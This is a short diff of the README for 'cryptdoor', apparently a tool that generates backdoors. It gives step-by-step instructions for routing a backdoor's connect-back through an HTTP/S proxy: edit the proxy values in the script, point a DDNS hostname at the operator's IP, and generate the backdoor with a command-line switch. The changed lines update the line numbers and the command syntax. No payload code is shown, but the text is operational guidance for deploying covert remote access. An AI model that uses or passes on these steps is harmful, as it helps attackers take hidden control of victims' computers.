Waflz/cryptdoor/README.md

 If you wish to have your backdoor connect back to you through a HTTP/s proxy, there a few things we have to do:

-1. Edit the cryptdoor script from line 260-262, and fill in the values for the proxy details.
+1. Edit the cryptdoor script from line 267-268, and fill in the values for the proxy details.

 2. Get a DDNS pointed at your IP (proxying does not work without one.)

-3. Then generate your backdoor in the normal way but replace the IP with your DDNS:
+3. Then generate your backdoor with the -x switch and replace the IP with your DDNS hostname:

-	./cryptdoor.py DDNS port
+	./cryptdoor.py -i DDNS -p port -x